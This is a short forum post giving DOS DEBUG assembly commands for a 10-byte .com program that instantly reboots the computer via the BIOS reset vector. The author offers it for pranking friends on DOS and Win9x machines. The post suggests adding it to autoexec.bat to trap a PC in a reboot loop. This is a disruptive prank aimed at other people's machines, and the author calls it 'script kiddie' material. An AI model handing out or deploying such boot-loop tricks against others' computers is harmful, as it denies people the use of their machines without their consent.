Hey ppl,

I have some code that you could use in fooling your friends on DOS / Win9x / Me boxes.
And it is *not* a copy/paste work, altough I'am sure this is writen elsewhere before me (perhaps in some assembler tutorial or so)

This is, in the wrong hands, script kiddie nfo. I know it.
But it can also be a fun tool.

-a 100
mov ax,40
mov dx,ax
mov ax,1234
mov [0072],ax
jmp f000:e05b

-r cx
:10
-n thename.com
-w

-q

This little prog, the last 5 lines are used to give it the name and write it to the disk, is only 10 bytes long and extremly fast.

It does a reset of your computer.

so you assemble this, type thename.com [Enter] and your computer reboots. If you put this in an autoexec.bat you can have some fun with a looping PC. (thats the lame part of this prog.)